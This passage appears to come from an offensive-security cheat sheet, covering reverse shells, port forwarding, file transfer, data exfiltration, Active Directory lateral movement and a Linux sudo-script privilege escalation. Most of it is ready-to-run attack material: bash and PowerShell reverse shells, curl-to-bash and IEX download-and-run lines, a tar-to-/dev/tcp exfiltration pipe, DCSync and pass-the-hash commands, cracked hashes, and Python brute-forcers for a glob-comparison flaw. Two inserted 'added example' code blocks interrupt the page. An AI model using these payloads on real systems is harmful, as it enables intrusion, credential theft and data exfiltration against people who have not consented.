Find out more about Java/JSP shells in the project at [ivan-sincek/java-reverse-tcp](https://github.com/ivan-sincek/java-reverse-tcp).

### Send a Payload With Python
**[`^ back to top ^`](#overview)**

Find out how to generate a reverse shell payload for Python and send it to the target machine in the project at [ivan-sincek/send-tcp-payload](https://github.com/ivan-sincek/send-tcp-payload).

### SMTP

Enumerate users:
```
nc -vn target 25
VRFY User_to_test
VRFY root
252 2.0.0 root        # this user exists
VRFY bla
550 5.1.1             # bla does not exist here
```

Reading emails using telnet:
```
telnet Ip_target port
```

```
$ telnet 172.20.10.2 110
USER username
PASS password
list
retr 1
```

## 4. Post Exploitation
**[`^ back to top ^`](#overview)**

### 4.1 Useful Websites
**[`^ back to top ^`](#overview)**

* [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [lolbas-project.github.io](https://lolbas-project.github.io)
* [gtfobins.org](https://gtfobins.org)
* [ghostpack-binaries](https://github.com/ghostpack-binaries)

### Generate a Reverse Shell Payload
**[`^ back to top ^`](#overview)**

Use [calebstewart/pwncat](https://github.com/calebstewart/pwncat):
```
pip install pwncat-cs
```

Listener:
```
pwncat-cs 192.168.1.1 4444
```

(To switch from the pwncat shell to a local shell, use Ctrl+D.)

Also use [`Reverse Shell Generator`](https://www.revshells.com/) or the options below.
```
bash -c "bash -i >& /dev/tcp//4444 0<&1"
```

```
/bin/bash -c 'exec bash -i &>/dev/tcp//4444 <&1'
```

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 4444 >/tmp/f
```

Create a Linux payload:
```
echo "bash -c 'bash -i >& /dev/tcp//4444 0<&1'" | base64
echo "bash -c 'bash -i >& /dev/tcp//4444 0>&1'" > shell.sh
```

Create a PowerShell payload (UTF-16LE encoded, then base64, as `-EncodedCommand` expects):
```
echo -n '$client = New-Object System.Net.Sockets.TCPClient("REMOTE_IP",REMOTE_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF8 -t UTF16LE | base64
```

Execute it:
```
?cmd=powershell -e payload
```

Create a PHP payload:
```
@php system("curl http://:8081/rev.sh|bash"); @endphp
```

Or use [`MSFVenom Payloads`](https://www.revshells.com/).

#### Generate a Reverse Shell Payload via MSFVenom
**[`^ back to top ^`](#overview)**

Find out how to generate a reverse shell payload for Windows OS, Linux OS, PHP, Java and send it to the target machine in the project at [MSFVenom Payloads](https://www.revshells.com/).
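Decoding a `powershell -e <payload>` command line, as found in process-creation logs, is the reverse of the `iconv -f UTF8 -t UTF16LE | base64` step above. The following is an added example and not part of the cheat sheet; it reproduces that encoding in Python and reverses it for log triage. The sample command line and its script are constructed and benign.

```python
"""Encode and decode PowerShell -EncodedCommand payloads.

Added example for the PowerShell payload above; not part of the Fox cheat
sheet. It reproduces the `iconv -f UTF8 -t UTF16LE | base64` encoding and
reverses it for command lines pulled from process-creation logs. The sample
command line is constructed and runs a harmless Write-Output.
"""
import base64
import binascii
import re

# Forms of the switch seen in logs: -EncodedCommand and its documented short
# forms -ec and -e (and the common -enc), with either dash or slash prefix.
_ENC_FLAG = re.compile(r"^[-/](e|ec|enc|encodedcommand)$", re.IGNORECASE)


def encode_command(script: str) -> str:
    """UTF-16LE, then base64: what [Convert]::ToBase64String(...Unicode.GetBytes(...)) emits."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse of encode_command. Raises ValueError if the blob is not a valid
    base64 UTF-16LE payload (bad characters, bad padding, odd byte count)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not base64: {exc}") from exc
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even number of bytes")
    return raw.decode("utf-16-le")


def extract_encoded_commands(cmdline: str) -> list:
    """Return the decoded script for each -EncodedCommand argument in a command line.

    Splits on whitespace (base64 never contains spaces); arguments that do not
    decode cleanly are skipped rather than raising, so a whole log can be scanned.
    """
    tokens = cmdline.split()
    decoded = []
    for flag, value in zip(tokens, tokens[1:]):
        if _ENC_FLAG.match(flag):
            try:
                decoded.append(decode_command(value))
            except (ValueError, UnicodeDecodeError):
                continue
    return decoded


# Constructed log line: the payload is the harmless script encoded with encode_command.
SAMPLE_SCRIPT = "Write-Output 'hello'"
SAMPLE_CMDLINE = f"powershell.exe -NoProfile -e {encode_command(SAMPLE_SCRIPT)}"

if __name__ == "__main__":
    print(SAMPLE_CMDLINE)
    for script in extract_encoded_commands(SAMPLE_CMDLINE):
        print("decoded:", script)
```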
### PowerShell Encoded Command
**[`^ back to top ^`](#overview)**

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:
```
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))
```

To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:
```
PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command
```

To decode a PowerShell encoded command, run the following PowerShell command:
```
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))
```

Find out more about PowerShell reverse and bind TCP shells in the project at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp).

### Basics

#### Stabilizing Linux Shell
**[`^ back to top ^`](#overview)**

```
script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset
screen
```

#### Port Forwarding
**[`^ back to top ^`](#overview)**

##### SSH Port Forwarding

Proxy port `8080` from the remote machine `` to `localhost`:
```
ssh -L 8080:localhost:8080 username@
```

Proxy port `80` from the remote machine `10.10.10.10` to `localhost`:
```
ssh -N -L 80:localhost:80 username@10.10.10.10 -C
```

##### sshuttle
**[`^ back to top ^`](#overview)**

Create a VPN-like tunnel through SSH to any subnet:
```
sshuttle -e "ssh <-i id_rsa_priv.key>" -r user@tunnel_ip &
sshuttle -e "ssh -i bob.key" -r bob@10.0.1.1 192.168.1.0/24 192.168.25.0/24 &
```

##### chisel
**[`^ back to top ^`](#overview)**

```
./chisel server -p 8000 --reverse                      # server (attacker)
./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100   # client (victim)
```

For example, there is a service on port 8083. Proxy it to see what it does. chisel was chosen here because it gives a more stable speed.
```
$ wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz
$ gzip -d chisel_1.9.1_windows_amd64.gz
$ mv chisel_1.9.1_windows_amd64 chisel.exe
$ chisel server --port 1133 --reverse
2024/02/21 13:24:22 server: Reverse tunnelling enabled
2024/02/21 13:24:22 server: Fingerprint c/HoJKuWS5e8QfRNRVjGpXQE5Nw5gSXLEFbzFried5M=
2024/02/21 13:24:22 server: Listening on http://0.0.0.0:1133

meterpreter > upload chisel.exe
meterpreter > shell
Process 5604 created.
Channel 3 created.
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\Users\tstark>.\chisel.exe client REMOTE_IP:1133 R:8083:127.0.0.1:8083
.\chisel.exe client REMOTE_IP:1133 R:8083:127.0.0.1:8083
2024/02/21 09:08:16 client: Connecting to ws://REMOTE_IP:1133
2024/02/21 09:08:18 client: Connected (Latency 156.9429ms)
```

For Linux:
```
./chisel client REMOTE_IP:1133 R:8083:127.0.0.1:8083
```

The tunnel is up; open `http://127.0.0.1:8083/` and take a look.
##### socat
**[`^ back to top ^`](#overview)**

On the victim:
```
socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 &
```

##### Netcat Portfwd
**[`^ back to top ^`](#overview)**

On the victim:
```
nc -nlvp 8080 -c "nc localhost 1234"
```

##### Meterpreter Portfwd
**[`^ back to top ^`](#overview)**

Proxy a port from the remote machine to local via a `Meterpreter` session:
```
(Meterpreter 2)(C:\Windows\system32) > portfwd add -l 9200 -p 9200 -r 127.0.0.1
[*] Forward TCP relay created: (local) :9200 -> (remote) 127.0.0.1:9200
```

#### Transfering Files Windows
**[`^ back to top ^`](#overview)**

cmd:
```
iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe"
wget -O shell.exe 10.10.10.10:8000/shell.exe
certutil -urlcache -f http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe
```

PowerShell:
```
Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')"
powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')"
```

Via SMB:
```
# On attacker
python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
# On target
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
```

#### Transfering Files Linux
**[`^ back to top ^`](#overview)**

```
wget http://10.10.10.10:8000/some.sh
curl -o some.sh http://10.10.10.10:8000/some.sh
```

Via base64:
```
cat shell.sh | base64 -w 0       # On attacker
echo | base64 -d > shell.sh      # On target
```

Via scp:
```
scp some.sh user@10.10.10.10:/tmp/some.sh   # On attacker
```

### Exfiltrating Data
**[`^ back to top ^`](#overview)**

#### Linux Exfiltrating Data
**[`^ back to top ^`](#overview)**

On kali:
```
nc -nlvp 80 > datafolder.tmp
```

On target:
```
tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80
```

On kali:
```
dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar
tar xf datafolder.tar
```

#### SSH Exfiltrating Data
**[`^ back to top ^`](#overview)**

On target:
```
tar zcf - /tmp/datafolder | ssh root@ "cd /tmp; tar zxpf -"
```

On kali:
```
cd /tmp/datafolder
```

#### Windows Exfiltrating Data
**[`^ back to top ^`](#overview)**

Via SMB server:
```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support   # On kali
net use \\10.10.16.5\share /u:user pass                                                                          # On victim
copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt                                           # On victim
```

Via `pscp`:
```
pscp Administrator@10.10.10.10:/Users/Administrator/Downloads/something.txt
```

### Active Directory and Windows Lateral Movement
**[`^ back to top ^`](#overview)**

#### ASREPRoast
**[`^ back to top ^`](#overview)**

`AS-REP Roasting` to get user hashes:
```
$ impacket-GetNPUsers / -usersfile users.txt -outputfile outputusers.txt -dc-ip -no-pass
$ cat outputusers.txt
$krb5asrep$23$jmontgomery@:7d8cc128c583c382aef2a6fa2d4ec321$cb396eb66b794e5e909d71ffa4cd6685dde517e4b96e493c8e659f0e3ba3115fa7efea11ec14040a382676bd5c37911354af87397d9bd91882c7127304c2194fba95c7f83e15473ace5ec5769f7711d54f91c51b75510b725348e8b78761874a4e54057056c599d94a491a6c9c347221e7215bb99cc528bbeb530293866662b9c23a13981ce41dc105f1a1d331ad818f547cb21fe3e24bc27ba18558cd002a258603b56709bf9670fff20af3bc0a1e8bbde3106439fb27427ddebe4a91cfa09cdfa8642a230f9cd6ea06d331b5d91435235bafaeaeb5200c75b110643f58cb53a0c4
$krb5asrep$23$lbradford@:1ed6777b1a90024c90cb66b7d3fc3578$8eef92a40e9c405e101e8383169fa8db91202010db8d64a242ab0ec9914d0a17f394b519b3ef8bb138faaba0fb85b91521d0629af96b66eae6e50eed31a9629753ca7f875b803a8546cd368010f40f11a2937576d4129380ec9edfafc18b3e2f2414a08747ba6d3e963a3dfa100dc48d1fb2cec6132343e9bc4bba7aed44ee7e259f24eda2e69ccd93a754133fd133028598f72c6c6d04fc0b9c029e1504454cbc6c2d5cb22f4549810b9b5694d23f6a8726ccbebdb07820bda7ff181dc16c65bdfb375c971833562f6c4efc44fd6a338ad0c2f9d9a30eabc6809ab8a5ef7b9f0a85
$krb5asrep$23$mlowe@:8d268a1ce5040c77262d6fb3e00dd850$4ccd13bd24c517bcc0d6a8aee6030dcec36cdf7ef347b5bace1633fde2438bf675fc57451df849641b5ac4ee13eb603b3a4aa48bff9aee0c7803d9173b3f55289f6ff9cd26a26b9b568e4c72e4c1f78368b9ad28fe0c5a4992c6ac8f347414f19474366bbfe8ae5260e205b08c589d2dbc7adb7ebbc3827cd0071f3e78bf4167c310a4a2514ac044d0540b5d9ba546b19d4f34062f68df5935b9af9f5cff893ceba13c34d452f23249a56e0cc39adc239fad13e6775c8d10541e0ed59594971e7b0f0e792c0b982cd00d4c90fb9aea9d1e44e6ad81a8fa38b2b370b00f241040a106
```

This yields three hashes. Crack them with [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) (mode `18200` is Kerberos 5 AS-REP etype 23):
```
$ hashcat -m 18200 outputusers.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$jmontgomery@:7d8cc128c583c382aef2a6fa2d4ec321$cb396eb66b794e5e909d71ffa4cd6685dde517e4b96e493c8e659f0e3ba3115fa7efea11ec14040a382676bd5c37911354af87397d9bd91882c7127304c2194fba95c7f83e15473ace5ec5769f7711d54f91c51b75510b725348e8b78761874a4e54057056c599d94a491a6c9c347221e7215bb99cc528bbeb530293866662b9c23a13981ce41dc105f1a1d331ad818f547cb21fe3e24bc27ba18558cd002a258603b56709bf9670fff20af3bc0a1e8bbde3106439fb27427ddebe4a91cfa09cdfa8642a230f9cd6ea06d331b5d91435235bafaeaeb5200c75b110643f58cb53a0c4:Midnight_121
```

#### bloodyAD
**[`^ back to top ^`](#overview)**

Add USERNAME to the `ServiceMgmt` group using bloodyAD:
```
bloodyAD -u AUTH_USERNAME -p 'PASSWORD' -d --host IP add groupMember SERVICEMGMT USERNAME
[+] USERNAME added to SERVICEMGMT
```

Give USERNAME `GenericAll` permissions on the OU and then change the `winrm_svc` user's password to a different one.

#### Bloodhound
**[`^ back to top ^`](#overview)**

Use BloodHound to collect useful information about the domain:
```
ntpdate -s dc01.
bloodhound-python -u USERNAME -p 'PASSWORD' -ns IP -d -c All
```

#### CrackMapExec
**[`^ back to top ^`](#overview)**

```
apt install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
cp /root/.cme/workspaces/default/smb.db ~/cme_smb.bak
rm -f /root/.cme/workspaces/default/smb.db
poetry run crackmapexec smb -u guest -p '' --shares --rid-brute 10000
poetry run crackmapexec smb -u anonymous -p "" --rid-brute
poetry run crackmapexec smb -u users.txt -p passwords.txt
```

With password spraying you can find every user that shares this password:
```
poetry run crackmapexec smb -u users.txt -p 'PASSWORD' --continue-on-success
```

Use the username list you have obtained to try `ASREPRoast`:
```
poetry run crackmapexec ldap -u users.txt -p '' --asreproast output.txt
```

#### DCSync
**[`^ back to top ^`](#overview)**

There is a technique to bypass the `The Account is sensitive and cannot be delegated` protection with RBCD (`Resource-based Constrained Delegation`):
```
ntpdate -s dc01.
getTGT.py -dc-ip "dc01." /'delegator$' -hashes ':8689904d05752e977a546e201d09e724'
export KRB5CCNAME=delegator\$.ccache

ntpdate -s dc01.
rbcd.py '/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass -dc-ip -debug

ntpdate -s dc01.
getTGT.py -dc-ip "dc01." ""/'ldap_monitor':'PASSWORD'
export KRB5CCNAME=ldap_monitor.ccache

ntpdate -s dc01.
getST.py -spn "browser/dc01." -impersonate "dc01$" "/ldap_monitor" -k -no-pass
export KRB5CCNAME=./delegator\$@dc01..ccache

ntpdate -s dc01.
getST.py -spn 'http/dc01.' -impersonate 'dc01$' -additional-ticket 'dc01$.ccache' '/delegator$' -k -no-pass
export KRB5CCNAME=dc01\$.ccache

ntpdate -s dc01.
secretsdump.py -no-pass -k dc01. -just-dc-ntlm
```

DCSync is a technique that impersonates a DC by simulating a replication process. The secretsdump.py tool is used to carry out this type of attack.
It sends an `IDL_DRSGetNCChanges` request to the `DRSUAPI` to replicate LDAP directory objects in a given naming context (NC), in order to retrieve Kerberos keys and the secrets contained in the `NTDS.DIT` database. We can now retrieve the NT hashes of all domain accounts, as we have `dcsync` rights (`DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`):
```
secretsdump.py -no-pass -k dc01. -just-dc-ntlm
```

#### dcom-exec
**[`^ back to top ^`](#overview)**

```
$ runas /user:\svc_openfire /netonly powershell
```

Then:
```
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X"))
# or
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.10.X.X")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping 10.10.X.X","7")
```

Use `dcomexec` with the `-silentcommand` option to get a shell as the `svc_openfire` user. For a reverse shell use `https://www.revshells.com/` with `PowerShell #3 (Base64)`, OS `Windows`:
```
$ impacket-dcomexec -object MMC20 /svc_openfire:'!@#$%^&*(1qazxsw'@ 'cmd.exe /c powershell -e BASE64_PAYLOAD' -silentcommand
Impacket v0.11.0 - Copyright 2023 Fortra
```

#### Decode Password
**[`^ back to top ^`](#overview)**

```
PS C:\Users> echo ENCRYPTED_STRING > test.txt
PS C:\Users> $EncryptedString = Get-Content .\test.txt
PS C:\Users> $SecureString = ConvertTo-SecureString $EncryptedString
PS C:\Users> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString
PS C:\Users> echo $Credential.GetNetworkCredential().password
f8gQ8fynP44ek1m3
```

#### Evil-WinRM
**[`^ back to top ^`](#overview)**

Check which users are allowed to connect via WinRM, then connect to the remote Windows machine via `winrm`:
```
poetry run crackmapexec winrm IP -u users.txt -p 'PASSWORD'
evil-winrm -i IP -u USERNAME -p 'PASSWORD'
```

Connect via `winrm` with an NT hash (`-H` instead of `-p`):
```
evil-winrm -i IP -u 'USERNAME' -H 'HASH'
```

#### kerbrute
**[`^ back to top ^`](#overview)**

Get valid users for the domain:
```
cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt possible-usernames.txt
sed -i "s|$|@DOMAIN.COM|" possible-usernames.txt
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build
./kerbrute userenum -d DOMAIN.COM ../possible-usernames.txt --dc DOMAIN.COM
```

#### ntpdate
**[`^ back to top ^`](#overview)**

Sync time with the domain controller:
```
ntpdate -s dc01.
```

#### powerview
**[`^ back to top ^`](#overview)**

Manual enumeration with powerview shows the permissions:
```
faketime -f +7h impacket-getTGT /ldap_monitor:'PASSWORD'
export KRB5CCNAME=./ldap_monitor.ccache
faketime -f +7h python3 powerview.py /ldap_monitor@IP -k --no-pass --dc-ip IP --use-ldaps
[2024-02-07 21:49:23] LDAP Signing NOT Enforced!
(LDAPS)-[IP]-[rebound\ldap_monitor]
PV > Get-ObjectAcl -Identity SERVICEMGMT
```

#### psexec
**[`^ back to top ^`](#overview)**

**Connection principle**: a binary is uploaded to the `C:\Windows` directory of the target over the pipe and a service is created on the remote machine. The binary is then run through the service, and the service and the binary are deleted afterwards. Because of this, the attack can be traced back through the logs. The uploaded binary will be checked by antivirus software when executed. (In the example below, the uploaded binary was lfLHJWHE.exe with the service name Zeno, both randomly generated.)

Connection conditions: port `445` open and a writable share, either `IPC$` or a non-`IPC$` share, because psexec has to write the binary to the target host. By default `C$` and `admin$` are enabled.
```
psexec.py DOMAIN/administrator@dc01. -hashes HASH
```

#### Rubeus
**[`^ back to top ^`](#overview)**

Rubeus has a `/nopreauth` parameter that uses a known username without pre-authentication to perform Kerberoasting.
```
..\Rubeus-master\Rubeus\bin\Debug> .\Rubeus.exe kerberoast /nopreauth:username /domain:DOMAIN.COM /dc:dc01.DOMAIN.COM /ldaps /spns:users.txt /nowrap
```

#### RunasCs
**[`^ back to top ^`](#overview)**

Getting a reverse shell via `RunasCs`:
```
.\RunasCs.exe USERNAME PASSWORD cmd.exe -r REMOTE_IP:4444
```

#### smbexec
**[`^ back to top ^`](#overview)**

**Connection principle**: similar to [psexec](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/smb/smb.rb), it creates a service on the remote system through file sharing, writes the command to be run by the service into a bat file, writes the execution result into a file to get the output of the executed command, and finally deletes the bat file, the output file and the service. While this technique may help to evade AV, the creation and deletion of services generates a lot of logs, so it is easy to trace back.

By default the script uses UTF-8 encoding, while many Chinese-locale machines default to GBK, which results in garbled output; use the `-codec` parameter to specify GBK, e.g. `python3 smbexec.py administrator:root@ -codec gbk` (a plaintext password is shown; the same works with a hash).

Sometimes you need to specify another share to connect to if the default `C$` share is not enabled. The command to connect to the `admin$` share is: `python3 smbexec.py administrator:root@ -codec gbk -share admin$`.
```
smbexec.py DOMAIN/administrator@dc01. -hashes HASH
```

#### wmiexec.py
**[`^ back to top ^`](#overview)**

The script uses WMI for command execution and does the best job of the three at evading AV checks.
```
wmiexec.py DOMAIN/administrator@dc01. -hashes HASH
```

### Linux Lateral Movement
**[`^ back to top ^`](#overview)**

Several tools can help you save time during the enumeration process. Use them to save time, knowing that they may miss some privilege escalation vectors.
Below is a list of popular Linux enumeration tools with links to their respective GitHub repositories.

Check `sudo` privileges:

```
sudo -l
```

#### Linux Search Non-Secure Files

**[`^ back to top ^`](#overview)**

Finding regular (non-system) users, i.e. UID >= 1000, from a copy of `/etc/passwd`:

```
awk -F: '{ if($3 >= 1000) print $1}' passwd >> users
```

Finding SUID executables (files that run with the permissions of their owner, so a user can execute them with rights they normally would not have):

```
find / -perm -4000 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
```

Reading `.bash_history` files:

```
for user in $(cat home_users); do echo $user; cat /home/$user/.bash_history ; echo -e "=====\n" ;done
```

Search the files of the directory `/etc` for the string `pass`:

```
grep -i -r "pass" ./etc/
grep -Frlw "pass" ./etc/
```

#### Unsafe Bash

If we find something unsafe in a bash script, such as [the unquoted variable comparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Techniques%20and%20Payloads/Command%20Injection/BASH.md#the-unquoted-variable-comparison) in the MySQL backup script below:

```
Variable expansion:
Good: "$my_var"
Bad: $my_var

Command substitution:
Good: "$(cmd)"
Bad: $(cmd)
```

For example, a user can run a backup script located at `/opt/scripts/mysql-backup.sh` with `sudo`. Inspecting the script reveals a comparison that is vulnerable to pattern (glob) injection:

```
...
if [[ $DB_PASS == $USER_PASS ]]; then
...
```

How to exploit it? As [documented here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Techniques%20and%20Payloads/Command%20Injection/BASH.md#the-unquoted-variable-comparison), if the right side of `==` inside `[[ ]]` is not quoted, bash performs pattern matching against it instead of treating it as a literal string. So an input of the form

```
{valid_password_char}{*}
```

matches whenever the guessed prefix is right: the double-bracket comparison lets us use wildcards to guess the password one character at a time, in a process similar to blind SQL injection.
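The guessing loop described above, generalized as an added example (this is not the page's own script): it works against any oracle that answers whether `[[ $secret == $pattern ]]` matched, escapes the glob metacharacters `* ? [` so that they can occur in the secret, and ends with an exact-match probe so that a character missing from the charset raises an error instead of silently truncating the result. The `fnmatch` oracle is a constructed stand-in for `/opt/scripts/mysql-backup.sh`; `make_script_oracle` shows how the real script would be wired in (the path and the `Password confirmed!` string are taken from the page, everything else is assumed).

```python
"""Blind, character-by-character recovery of a secret that a script compares with
an unquoted pattern:  if [[ $DB_PASS == $USER_PASS ]]; then ...

Added example, not the page's own script. Any callable that returns True when the
supplied pattern matched the secret can serve as the oracle: the local one below is
a constructed stand-in using fnmatch, the other wraps the real sudo-run script."""
import fnmatch
import string
import subprocess
from typing import Callable

Oracle = Callable[[str], bool]

# Characters that bash (and fnmatch) treat as glob metacharacters. A guess containing
# them unescaped would match far too much, so they are wrapped in a bracket expression.
GLOB_META = "*?["

DEFAULT_CHARSET = string.ascii_letters + string.digits + string.punctuation


def escape_glob(text: str) -> str:
    """Return text as a pattern that matches only itself ('a*b' -> 'a[*]b')."""
    return "".join(f"[{c}]" if c in GLOB_META else c for c in text)


def make_local_oracle(secret: str) -> Oracle:
    """Constructed stand-in for the vulnerable script: [[ secret == pattern ]]."""
    return lambda pattern: fnmatch.fnmatchcase(secret, pattern)


def make_script_oracle(script: str = "/opt/scripts/mysql-backup.sh") -> Oracle:
    """Real oracle (assumed wiring): pipe the guess into the script; success is exit
    status 0 or the confirmation string the page's script prints."""
    def oracle(pattern: str) -> bool:
        proc = subprocess.run(["sudo", script], input=pattern + "\n",
                              capture_output=True, text=True)
        return proc.returncode == 0 or "Password confirmed!" in proc.stdout
    return oracle


def brute_force(oracle: Oracle, charset: str = DEFAULT_CHARSET, max_len: int = 128) -> str:
    """Extend a known prefix one character at a time with '<prefix><c>*' probes."""
    known = ""
    while len(known) < max_len:
        for c in charset:
            if oracle(escape_glob(known + c) + "*"):
                known += c
                break
        else:
            break  # no character in the charset extends the prefix
    # Final exact probe (no trailing '*'): distinguishes "recovered the whole secret"
    # from "the next character is not in the charset".
    if not oracle(escape_glob(known)):
        raise ValueError(f"prefix {known!r} matches but is incomplete; widen the charset")
    return known


if __name__ == "__main__":
    demo_secret = "kljh12k3jhaskjh12kjh3"  # the value recovered on the page
    print(brute_force(make_local_oracle(demo_secret)))
    # Against the real script: print(brute_force(make_script_oracle()))
```

Each probe costs one `sudo` invocation, so the run time is roughly `len(secret) * len(charset) / 2` script executions; the exact-match probe at the end is what tells you whether to widen the charset and rerun.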
To find out more about the difference between single and double brackets read this: https://www.baeldung.com/linux/bash-single-vs-double-brackets#4-pattern-matching. In summary, with `DB_PASS=Password123!` both conditions `[[ $DB_PASS == Password123! ]]` and `[[ $DB_PASS == P* ]]` evaluate to true in the `if` statement.

To brute force the password you can use 3 methods:

- **Manually**. Letter by letter, **not recommended**.
- **Semi-manually**. Create a file called `letters` containing all lower-case, upper-case and digit characters and brute force them using a loop. As soon as you find a new character, prepend it to the guess in the loop (e.g. `...echo abcde$i*...`) and repeat until no more letters are discovered. The first loop iteration would look like this:

  ```
  for i in $(cat letters); do echo "$i*" | sudo /opt/scripts/mysql-backup.sh >/dev/null && echo "$i"; done
  ```

- **Using a python script**. Elegant and fast. The machine also has perl installed. A proposed python script would be the following:

```
import string
import os

chars = string.ascii_letters + string.digits
password = ''
keep_going = 1
print("[+] Initializing bruteforce script...")
print("[+] Bruteforce in progress, please wait...")
while keep_going == 1:
    for i in chars:
        # exit status 0 means the pattern matched and the script carried on
        errorlevel = os.system("echo " + password + i + "* | sudo /opt/scripts/mysql-backup.sh >/dev/null 2>&1")
        if errorlevel == 0:
            password = password + i
            print("[+] new character found: " + password)
            keep_going = 1
            break
        else:
            keep_going = 0
print("[+] Process terminated, root password is: " + password)
```

Alternatively, we can guess or brute force the first password character followed by `*` to bypass the password prompt, and then brute force every character of the password until all of them have been found. The following python script does exactly that and extracts the password.
```
import string
import subprocess

all_chars = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in all_chars:
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        # no character extended the match: the whole password has been recovered
        found = True
```

Running it, the root MySQL password is revealed in less than a minute, and it turns out to be a reuse of the system's root password.

```
joshua@server:~$ nano 1.py
joshua@server:~$ python3 1.py
k
kl
klj
kljh
kljh1
kljh12
kljh12k
kljh12k3
kljh12k3j
kljh12k3jh
kljh12k3jha
kljh12k3jhas
kljh12k3jhask
kljh12k3jhaskj
kljh12k3jhaskjh
kljh12k3jhaskjh1
kljh12k3jhaskjh12
kljh12k3jhaskjh12k
kljh12k3jhaskjh12kj
kljh12k3jhaskjh12kjh
kljh12k3jhaskjh12kjh3
```

#### base64

**[`^ back to top ^`](#overview)**

Base64 encode/decode:

```
echo "TEST" | base64
VEVTVAo=
echo "VEVTVAo=" | base64 --decode
TEST
```

##### PowerShell ToBase64String and Linux base64

PowerShell's `-EncodedCommand` expects the command as UTF-16LE text encoded with base64, so convert with `iconv` before encoding:

```
echo -n '$client = New-Object System.Net.Sockets.TCPClient("<host>",4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF8 -t UTF16LE | base64
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBO
AGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAPABoAG8AcwB0AD4A
IgAsADQANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0
AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4A
LgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBl
AGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUA
